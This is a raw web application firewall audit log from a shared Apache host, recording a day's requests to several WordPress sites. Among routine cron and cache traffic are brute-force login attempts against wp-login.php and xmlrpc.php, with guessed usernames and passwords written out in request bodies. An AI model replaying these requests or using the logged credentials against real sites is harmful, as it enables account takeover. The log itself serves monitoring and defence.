Server: Apache Engine-Mode: "ENABLED" --e90c831c-Z-- --9d4a8911-A-- [30/Jun/2025:19:15:45.561421 +0530] aGKVCTGb89TevrjDLkKYUwAAABs 57.141.0.8 54964 192.168.74.40 443 --9d4a8911-B-- GET /https/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-agra/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/testimonials/Rajasthan-Travel-Guides/Car-Rentals-Agra.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --9d4a8911-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9d4a8911-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751293224283869 16645 (- - -) Stopwatch2: 1751293224283869 16645; combined=4064, p1=158, p2=3797, p3=0, p4=0, p5=108, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --95615e31-Z-- --e59ae04b-A-- [30/Jun/2025:19:50:26.097522 +0530] aGKdKo0dd2nPn69n6Ml2TAAAABc 103.185.74.40 61264 192.168.74.40 443 --e59ae04b-B-- POST /wp-cron.php?doing_wp_cron=1751293226.0105071067810058593750 HTTP/1.1 Host: digitaltheka.com User-Agent: WordPress/6.8.1; https://digitaltheka.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --e59ae04b-C-- --e59ae04b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --e59ae04b-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=4954, p1=84, p2=4657, p3=208, p4=5, p5=0, sr=53, sw=0, l=0, gc=0||Py scan:7652||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751293226081634 16232 (- - -) Stopwatch2: 1751293226081634 16232; combined=5346, p1=84, p2=4657, p3=208, p4=5, p5=330, sr=53, sw=0, l=0, gc=62 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e59ae04b-Z-- --00b6e03c-A-- [30/Jun/2025:19:50:26.315823 +0530] aGKdKAzBTyahmYRol-Ju0QAAABA 31.193.2.236 52240 192.168.74.40 443 --00b6e03c-B-- POST /xmlrpc.php HTTP/1.1 Host: fastraccholidays.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0 Content-Length: 218 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9 Accept-Encoding: gzip, zstd Accept-Language: ja-JP,ja;q=0.9 Content-Type: application/xml Referer: https://fastraccholidays.com --00b6e03c-C-- <?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>fastracc</string></value></param><param><value><string>@fastracc123</string></value></param></params></methodCall> --00b6e03c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751294728618930 13614 (- - -) Stopwatch2: 1751294728618930 13614; combined=2514, p1=112, p2=2215, p3=0, p4=0, p5=187, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --ce863f5f-Z-- --c66d3a4b-A-- [30/Jun/2025:20:15:29.025253 +0530] aGKjB8B3aX0RvqUPEP-tEAAAACs 103.185.74.40 13491 192.168.74.40 443 --c66d3a4b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --c66d3a4b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c66d3a4b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751294727755494 1270207 (- - -) Stopwatch2: 1751294727755494 1270207; combined=2161, p1=95, p2=1879, p3=0, p4=0, p5=187, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --c66d3a4b-Z-- --65d5f07b-A-- [30/Jun/2025:20:15:29.480888 +0530] aGKjCe9BbPNhoDnNq93tAgAAADA 20.171.207.232 48620 192.168.74.40 443 --65d5f07b-B-- GET /https/aainag/images/testimonials/https/js/images/images/hotels-jodhpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --65d5f07b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --65d5f07b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751294729465942 15310 (- - -) Stopwatch2: 1751294729465942 15310; combined=3119, p1=162, p2=2825, p3=0, p4=0, p5=131, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --65d5f07b-Z-- --b7d22128-A-- [30/Jun/2025:20:15:30.436059 +0530] aGKjCTKvYPDEW93DbxjAEwAAACc 103.185.74.40 16444 192.168.74.40 443 --b7d22128-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b7d22128-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b7d22128-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751294729236779 1199642 (- - -) Stopwatch2: 1751294729236779 1199642; combined=2223, p1=98, p2=1942, p3=0, p4=0, p5=182, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b7d22128-Z-- --48a2be05-A-- [30/Jun/2025:20:15:30.593486 +0530] aGKjCu9BbPNhoDnNq93tAwAAADA 20.171.207.232 48620 192.168.74.40 443 --48a2be05-B-- GET /https/aainag/images/testimonials/https/js/js/js/rajasthan-destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --48a2be05-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --48a2be05-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296696058021 878292 (- - -) Stopwatch2: 1751296696058021 878292; combined=10399, p1=167, p2=9499, p3=324, p4=7, p5=402, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --731ed64d-Z-- --01ef217e-A-- [30/Jun/2025:20:48:17.125629 +0530] aGKqty-9ghEHYNBhT-IqEwAAAAk 103.185.74.40 16704 192.168.74.40 443 --01ef217e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --01ef217e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --01ef217e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296695832563 1293693 (- - -) Stopwatch2: 1751296695832563 1293693; combined=3126, p1=115, p2=2880, p3=0, p4=0, p5=131, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --01ef217e-Z-- --e024243e-A-- [30/Jun/2025:20:48:17.139199 +0530] aGKquLtn7Hk30HQdG1_K3gAAACA 188.166.88.13 56124 192.168.74.40 80 --e024243e-B-- POST /wp-login.php HTTP/1.1 Host: novemsol.com Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=ff9831fa6600d5e731e02b11ce611bff; wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 83 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296697972006 525146 (- - -) Stopwatch2: 1751296697972006 525146; combined=8835, p1=125, p2=7931, p3=349, p4=10, p5=419, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cf679969-Z-- --181f1329-A-- [30/Jun/2025:20:48:18.541600 +0530] aGKquZtJ9OcZl5ZO8WlQ9QAAACw 103.185.74.40 15558 192.168.74.40 443 --181f1329-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --181f1329-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --181f1329-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296697337575 1204749 (- - -) Stopwatch2: 1751296697337575 1204749; combined=3555, p1=145, p2=3223, p3=0, p4=0, p5=186, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --181f1329-Z-- --69316408-A-- [30/Jun/2025:20:48:18.722429 +0530] aGKquhdZT6QI_9laxc8HwgAAAEI 188.166.88.13 51547 192.168.74.40 443 --69316408-B-- POST //xmlrpc.php HTTP/1.1 Host: www.bossits.in Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/xml Content-Length: 487 -- Apache-Handler: application/x-httpd-ea-php74___lsphp Stopwatch: 1751296701834999 646429 (- - -) Stopwatch2: 1751296701834999 646429; combined=9402, p1=225, p2=8433, p3=332, p4=7, p5=405, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --9ef68467-Z-- --085d3d1e-A-- [30/Jun/2025:20:48:22.494246 +0530] aGKqvcC8EFOcQtWujkVRlAAAAD8 103.185.74.40 55816 192.168.74.40 443 --085d3d1e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --085d3d1e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --085d3d1e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296701251770 1243114 (- - -) Stopwatch2: 1751296701251770 1243114; combined=2719, p1=97, p2=2440, p3=0, p4=0, p5=182, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --085d3d1e-Z-- --bd7ca414-A-- [30/Jun/2025:20:48:22.691330 +0530] aGKqvQQvEAMqZ5pjIQncPAAAAEc 188.166.88.13 62745 192.168.74.40 443 --bd7ca414-B-- POST //wp-login.php HTTP/1.1 Host: rmhil.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 80 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296703297875 642824 (- - -) Stopwatch2: 1751296703297875 642824; combined=6170, p1=128, p2=5237, p3=348, p4=8, p5=449, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ffe7f366-Z-- --4d52ce2e-A-- [30/Jun/2025:20:48:23.945845 +0530] aGKqvrtJ5oARuhVeBNEOYwAAADE 103.185.74.40 31857 192.168.74.40 443 --4d52ce2e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4d52ce2e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4d52ce2e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296702713889 1232434 (- - -) Stopwatch2: 1751296702713889 1232434; combined=2677, p1=113, p2=2431, p3=0, p4=0, p5=133, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4d52ce2e-Z-- --9dc8b25c-A-- [30/Jun/2025:20:48:23.955373 +0530] aGKqvyCrI8h7G93_YJtAIAAAABo 188.166.88.13 57050 192.168.74.40 80 --9dc8b25c-B-- GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1 Host: rajasthantour.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 --9dc8b25c-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298412466219 5348763 (- - -) Stopwatch2: 1751298412466219 5348763; combined=6921, p1=174, p2=6237, p3=227, p4=5, p5=278, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --4aaeca31-Z-- --12c1a97c-A-- [30/Jun/2025:21:16:57.817056 +0530] aGKxa1i_NV0xgInTbBWlXAAAAD0 103.185.74.40 13689 192.168.74.40 443 --12c1a97c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --12c1a97c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --12c1a97c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298411757360 6059856 (- - -) Stopwatch2: 1751298411757360 6059856; combined=7313, p1=77, p2=7112, p3=0, p4=0, p5=123, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --12c1a97c-Z-- --7b006b2d-A-- [30/Jun/2025:21:16:57.911108 +0530] aGKxb3DzVReb5h0dql9UWwAAAAY 188.166.88.13 54551 192.168.74.40 443 --7b006b2d-B-- POST //wp-login.php HTTP/1.1 Host: rukunaltazaj.com Keep-Alive: 300 Connection: keep-alive Cookie: pll_language=en; wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 85 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://rukunaltazaj.com//wp-login.php --7b006b2d-C-- log=rukun&pwd=0192837465&redirect_to=https://rukunaltazaj.com//wp-admin/&testcookie=1 --7b006b2d-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298423122866 486782 (- - -) Stopwatch2: 1751298423122866 486782; combined=9565, p1=90, p2=8984, p3=219, p4=5, p5=266, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9436266d-Z-- --82589d38-A-- [30/Jun/2025:21:17:03.623087 +0530] aGKxcCMLXTT0mySc_pxrYgAAAGY 103.185.74.40 48799 192.168.74.40 443 --82589d38-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --82589d38-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --82589d38-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298416816648 6806715 (- - -) Stopwatch2: 1751298416816648 6806715; combined=6936, p1=236, p2=6551, p3=0, p4=0, p5=149, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --82589d38-Z-- --35765d68-A-- [30/Jun/2025:21:17:03.638189 +0530] aGKxdh5YY9pixRH-YzCH6wAAAF0 188.166.88.13 59031 192.168.74.40 443 --35765d68-B-- POST //wp-login.php HTTP/1.1 Host: designretouch.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 102 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://designretouch.com//wp-login.php --35765d68-C-- log=designretouch&pwd=designretouch55555&redirect_to=https://designretouch.com//wp-admin/&testcookie=1 --35765d68-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298454585572 836340 (- - -) Stopwatch2: 1751298454585572 836340; combined=6064, p1=130, p2=5425, p3=235, p4=4, p5=270, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d8ae7349-Z-- --01e7c557-A-- [30/Jun/2025:21:17:35.453154 +0530] aGKxlL5LekqEkvaZPL0MegAAAEU 103.185.74.40 47136 192.168.74.40 443 --01e7c557-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --01e7c557-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --01e7c557-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298452470616 2983234 (- - -) Stopwatch2: 1751298452470616 2983234; combined=2888, p1=93, p2=2635, p3=0, p4=0, p5=160, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --01e7c557-Z-- --303eed73-A-- [30/Jun/2025:21:17:35.464255 +0530] aGKxllqHigGvQG-1bcMyJQAAABo 188.166.88.13 62158 192.168.74.40 443 --303eed73-B-- POST //wp-login.php HTTP/1.1 Host: marketingservices.kutility.com Keep-Alive: 300 Connection: keep-alive Cookie: utm_source=deleted; utm_medium=deleted; utm_term=deleted; utm_content=deleted; utm_campaign=deleted; gclid=deleted; handl_original_ref=deleted; handl_landing_page=https%3A%2F%2Fmarketingservices.kutility.com%2F%2Fxmlrpc.php; handl_ip=188.166.88.13; handl_ref=deleted; handl_url=https%3A%2F%2Fmarketingservices.kutility.com%2F%2Fxmlrpc.php; email=deleted; username=deleted; wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 95 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298453145224 6068096 (- - -) Stopwatch2: 1751298453145224 6068096; combined=6874, p1=139, p2=5840, p3=391, p4=9, p5=494, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
